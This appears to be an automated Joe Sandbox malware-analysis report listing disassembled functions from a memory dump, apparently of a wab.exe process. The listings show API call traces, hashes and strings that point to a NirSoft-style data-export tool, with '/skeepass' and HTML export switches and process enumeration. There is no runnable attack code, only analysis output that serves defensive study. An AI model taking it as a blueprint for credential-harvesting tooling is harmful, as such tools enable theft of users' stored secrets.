                                                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                • String ID: |A
                                                                                                                • API String ID: 4233704886-1717621600
                                                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 2012295524-70141382
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                • memcpy.MSVCRT ref: 0041234D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1700100422-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 552707033-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                • memcpy.MSVCRT ref: 0040C11B
                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                • String ID: 4$h
                                                                                                                • API String ID: 4066021378-1856150674
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                • String ID: A
                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                • memcpy.MSVCRT ref: 00413A1B
                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy
                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 290601579-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                • String ID: PD$PD
                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 239872665-3916222277
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                • memcpy.MSVCRT ref: 0040EB80
                                                                                                                • memcpy.MSVCRT ref: 0040EB94
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID: ($d
                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3015003838-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                Memory Dump Source
